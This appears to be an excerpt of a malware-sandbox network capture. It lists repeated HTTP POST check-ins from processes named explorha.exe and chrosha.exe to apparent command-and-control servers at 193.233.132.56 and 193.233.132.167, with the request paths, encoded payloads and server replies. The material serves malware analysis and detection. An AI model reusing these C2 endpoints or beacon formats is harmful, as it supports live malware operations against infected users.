Date: Fri, 19 Apr 2024 01:31:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:31:01.400871038 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:01.647692919 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
229 | 192.168.2.5 | 50070 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:01.410794973 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:01.653279066 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
230 | 192.168.2.5 | 50071 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:01.903209925 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:02.154031038 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
231 | 192.168.2.5 | 50072 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:02.002891064 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:02.247278929 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:31:02.248308897 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:02.501039028 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
232 | 192.168.2.5 | 50073 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:02.504271984 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:02.747591019 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
233 | 192.168.2.5 | 50074 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:02.865746975 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:03.111253023 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:31:03.118171930 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:03.368606091 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
234 | 192.168.2.5 | 50075 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:02.998181105 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:03.250096083 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
235 | 192.168.2.5 | 50076 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:03.615123034 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:03.858124971 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
236 | 192.168.2.5 | 50077 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:03.728660107 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:03.971520901 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:31:03.974216938 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:04.222142935 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
237 | 192.168.2.5 | 50078 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:04.105647087 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:04.351269007 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
238 | 192.168.2.5 | 50079 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:04.579916000 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:04.821367025 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
239 | 192.168.2.5 | 50080 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:04.707042933 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:04.949771881 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
240 | 192.168.2.5 | 50081 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:05.065752029 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:05.309966087 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
241 | 192.168.2.5 | 50082 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:05.201503992 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:05.454641104 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
242 | 192.168.2.5 | 50083 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:05.667602062 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:05.916192055 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
243 | 192.168.2.5 | 50084 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:05.817188025 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:06.061609983 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
244 | 192.168.2.5 | 50085 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:06.164635897 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:06.413126945 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
245 | 192.168.2.5 | 50086 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
